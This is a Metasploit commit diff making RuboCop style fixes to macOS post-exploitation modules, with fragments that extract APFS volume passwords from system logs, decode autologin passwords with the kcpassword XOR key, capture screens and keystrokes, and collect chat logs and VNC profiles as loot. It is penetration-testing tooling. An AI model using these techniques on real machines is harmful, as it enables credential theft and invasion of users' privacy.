modules/post/osx: Resolve RuboCop violations

Author: bcoles

modules/post/osx/admin/say.rb

@@ -19,7 +19,12 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Author' => [ 'sinn3r'],
         'Platform' => [ 'osx' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [AUDIO_EFFECTS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -34,7 +39,7 @@ def initialize(info = {})
   def exec(cmd)
     tries = 0
     begin
-      out = cmd_exec(cmd).chomp
+      cmd_exec(cmd).chomp
     rescue ::Timeout::Error => e
       tries += 1
       if tries < 3

modules/post/osx/capture/keylog_recorder.rb

@@ -39,7 +39,12 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Author' => [ 'joev'],
         'Platform' => [ 'osx'],
-        'SessionTypes' => [ 'shell', 'meterpreter' ]
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
 

modules/post/osx/capture/screen.rb

@@ -20,7 +20,12 @@ def initialize(info = {})
           'Peter Toth <globetother[at]gmail.com>' # ported windows version to osx
         ],
         'Platform' => [ 'osx' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'Reliability' => []
+        }
       )
     )
 
@@ -65,8 +70,7 @@ def run
       Rex.sleep(delay) unless num <= 0
 
       begin
-        # This is an OSX module, so mkdir -p should be fine
-        cmd_exec("mkdir -p #{tmp_path}")
+        mkdir(tmp_path)
         filename = Rex::Text.rand_text_alpha(7)
         file = "#{tmp_path}/#{filename}"
         cmd_exec("#{exe_path} -x -C -t #{file_type} #{file}")
@@ -75,7 +79,7 @@ def run
       rescue ::Rex::Post::Meterpreter::RequestError => e
         print_error('Error taking the screenshot')
         vprint_error("#{e.class} #{e} #{e.backtrace}")
-        return
+        break
       end
 
       unless data
@@ -92,12 +96,12 @@ def run
       rescue ::IOError, ::Errno::ENOENT => e
         print_error('Error storing screenshot')
         vprint_error("#{e.class} #{e} #{e.backtrace}")
-        return
+        break
       end
     end
 
     print_status('Screen Capturing Complete')
-    if file_locations && !file_locations.empty?
+    unless file_locations.blank?
       print_status('Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot')
     end
   end

modules/post/osx/gather/apfs_encrypted_volume_passwd.rb

@@ -29,7 +29,12 @@ def initialize(info = {})
           'cbrnrd'          # Metasploit module
         ],
         'SessionTypes' => [ 'shell', 'meterpreter' ],
-        'DisclosureDate' => '2018-03-21'
+        'DisclosureDate' => '2018-03-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
     register_options([
@@ -47,25 +52,28 @@ def check
 
   def run
     if check == Exploit::CheckCode::Safe
-      print_error 'This version of OSX is not vulnerable'
+      print_error('This version of OSX is not vulnerable')
       return
     end
+
     cmd = "log show --info --predicate 'eventMessage contains \"newfs_\"'"
     cmd << " | grep #{datastore['MOUNT_PATH']}" unless datastore['MOUNT_PATH'].empty?
-    vprint_status "Running \"#{cmd}\" on target..."
+    vprint_status("Running \"#{cmd}\" on target...")
     results = cmd_exec(cmd)
-    vprint_status "Target results:\n#{results}"
+    vprint_status("Target results:\n#{results}")
+
     if results.empty?
       print_error 'Got no response from target. Stopping...'
-    else
-      successful_lines = 0
-      results.lines.each do |l|
-        next unless l =~ /newfs_apfs(.*)-S(.*)$/
+      return
+    end
+
+    successful_lines = 0
+    results.lines.each do |l|
+      next unless l =~ /newfs_apfs(.*)-S(.*)$/
 
-        print_good "APFS command found: #{::Regexp.last_match(0)}"
-        successful_lines += 1
-      end
-      print_error 'No password(s) found for any volumes. Exiting...' if successful_lines.zero?
+      print_good "APFS command found: #{::Regexp.last_match(0)}"
+      successful_lines += 1
     end
+    print_error 'No password(s) found for any volumes. Exiting...' if successful_lines.zero?
   end
 end

modules/post/osx/gather/autologin_password.rb

@@ -7,7 +7,7 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::OSX::Priv
 
-  # extract/verify by by XORing your kcpassword with your password
+  # extract/verify by XORing your kcpassword with your password
   AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F]
 
   def initialize(info = {})
@@ -26,9 +26,14 @@ def initialize(info = {})
         'Author' => [ 'joev' ],
         'Platform' => [ 'osx' ],
         'References' => [
-          ['URL', 'http://www.brock-family.org/gavin/perl/kcpassword.html']
+          ['URL', 'https://web.archive.org/web/20180408062145/http://www.brock-family.org/gavin/perl/kcpassword.html'],
         ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
 

modules/post/osx/gather/enum_adium.rb

@@ -30,7 +30,12 @@ def initialize(info = {})
           ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],
           ['ALL', { 'Description' => 'Collect both account plists and chat logs' }]
         ],
-        'DefaultAction' => 'ALL'
+        'DefaultAction' => 'ALL',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK],
+          'Reliability' => []
+        }
       )
     )
 
@@ -43,12 +48,11 @@ def initialize(info = {})
 
   #
   # Parse a plst file to XML format:
-  # http://hints.macworld.com/article.php?story=20050430105126392
+  # https://web.archive.org/web/20141112034745/http://hints.macworld.com/article.php?story=20050430105126392
   #
   def plutil(filename)
     exec("plutil -convert xml1 #{filename}")
-    data = exec("cat #{filename}")
-    return data
+    exec("cat #{filename}")
   end
 
   #
@@ -148,7 +152,7 @@ def get_account_info(base)
       # Save data, and then clean up
       #
       if xml.empty?
-        print_error("#{@peer} - Unalbe to parse: #{file}")
+        print_error("#{@peer} - Unable to parse: #{file}")
       else
         loot << { filename: file, data: xml }
         exec("rm #{rand_name}")
@@ -220,7 +224,7 @@ def dir(path)
   # and retry under certain conditions.
   #
   def exec(cmd)
-    out = cmd_exec(cmd).chomp
+    cmd_exec(cmd).chomp
   rescue ::Timeout::Error => e
     vprint_error("#{@peer} - #{e.message} - retrying...")
     retry
@@ -260,17 +264,18 @@ def run
 
     #
     # Check adium.  And then set the default profile path
+    # Example: /Users/[username]/Library/Application Support/Adium 2.0/
     #
     base = "/Users/#{user}/Library/Application\\ Support/"
     adium_path = locate_adium(base)
-    if adium_path
-      print_status("#{@peer} - Found adium: #{adium_path}")
-      adium_path += 'Users/Default/'
-    else
+    unless adium_path
       print_error("#{@peer} - Unable to find adium, will not continue")
       return
     end
 
+    print_status("#{@peer} - Found adium: #{adium_path}")
+    adium_path += 'Users/Default/'
+
     #
     # Now that adium is found, let's download some stuff
     #
@@ -284,8 +289,3 @@ def run
     save(:chatlogs, chatlogs) if !chatlogs.nil? && !chatlogs.empty?
   end
 end
-
-=begin
-Adium:
-/Users/[username]/Library/Application\ Support/Adium\ 2.0/
-=end

modules/post/osx/gather/enum_airport.rb

@@ -18,15 +18,20 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Author' => [ 'sinn3r'],
         'Platform' => [ 'osx' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end
 
   def exec(cmd)
     tries = 0
     begin
-      out = cmd_exec(cmd).chomp
+      cmd_exec(cmd).chomp
     rescue ::Timeout::Error => e
       tries += 1
       if tries < 3

modules/post/osx/gather/enum_chicken_vnc_profile.rb

@@ -19,7 +19,12 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Author' => [ 'sinn3r'],
         'Platform' => [ 'osx' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end
@@ -35,7 +40,7 @@ def whoami
   def exec(cmd)
     tries = 0
     begin
-      out = cmd_exec(cmd).chomp
+      cmd_exec(cmd).chomp
     rescue ::Timeout::Error => e
       tries += 1
       if tries < 3
@@ -61,20 +66,20 @@ def dir(path)
 
   def locate_chicken
     dir('/Applications/').each do |folder|
-      m = folder.match(/Chicken of the VNC\.app/)
-      return true
+      return true if folder.match(/Chicken of the VNC\.app/)
     end
 
     return false
   end
 
   def get_profile_plist(user)
     f = exec("cat /Users/#{user}/Library/Preferences/com.geekspiff.chickenofthevnc.plist")
+
     if f =~ /No such file or directory/
       return nil
-    else
-      return f
     end
+
+    f
   end
 
   def save(file)
@@ -96,10 +101,10 @@ def run
     if !locate_chicken
       print_error("#{@peer} - Chicken of the VNC is not installed")
       return
-    else
-      print_status("#{@peer} - Chicken of the VNC found")
     end
 
+    print_status("#{@peer} - Chicken of the VNC found")
+
     plist = get_profile_plist(user)
     if plist.nil?
       print_error('No profile plist found')

modules/post/osx/gather/enum_colloquy.rb

@@ -29,7 +29,12 @@ def initialize(info = {})
           ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],
           ['ALL', { 'Description' => 'Collect both the plists and chat logs' }]
         ],
-        'DefaultAction' => 'ALL'
+        'DefaultAction' => 'ALL',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
 
@@ -42,12 +47,11 @@ def initialize(info = {})
 
   #
   # Parse a plst file to XML format:
-  # http://hints.macworld.com/article.php?story=20050430105126392
+  # https://web.archive.org/web/20141112034745/http://hints.macworld.com/article.php?story=20050430105126392
   #
   def plutil(filename)
     exec("plutil -convert xml1 #{filename}")
-    data = exec("cat #{filename}")
-    return data
+    exec("cat #{filename}")
   end
 
   def get_chatlogs(base)
@@ -125,7 +129,7 @@ def dir(path)
   def exec(cmd)
     tries = 0
     begin
-      out = cmd_exec(cmd).chomp
+      cmd_exec(cmd).chomp
     rescue ::Timeout::Error => e
       tries += 1
       if tries < 3
@@ -150,6 +154,10 @@ def run
     @peer = "#{session.session_host}:#{session.session_port}"
     user = whoami
 
+    # Examples:
+    # /Users/[user]/Library/Preferences/info.colloquy.plist
+    # /Users/[user]/Documents/Colloquy Transcripts
+    # /Users/[user]/Documents/Colloquy Transcripts//[server]/[contact] 10-13-11.colloquyTranscript
     transcripts_path = "/Users/#{user}/Documents/Colloquy Transcripts/"
     prefs_path = "/Users/#{user}/Library/Preferences/info.colloquy.plist"
 
@@ -160,11 +168,3 @@ def run
     save(:chatlogs, chatlogs) if !chatlogs.nil? && !chatlogs.empty?
   end
 end
-
-=begin
-/Users/[user]/Documents/Colloquy Transcripts
-/Users/[user]/Library/Preferences/info.colloquy.plist
-
-Transcript example:
-/Users/[username]/Documents/Colloquy Transcripts//[server]/[contact] 10-13-11.colloquyTranscript
-=end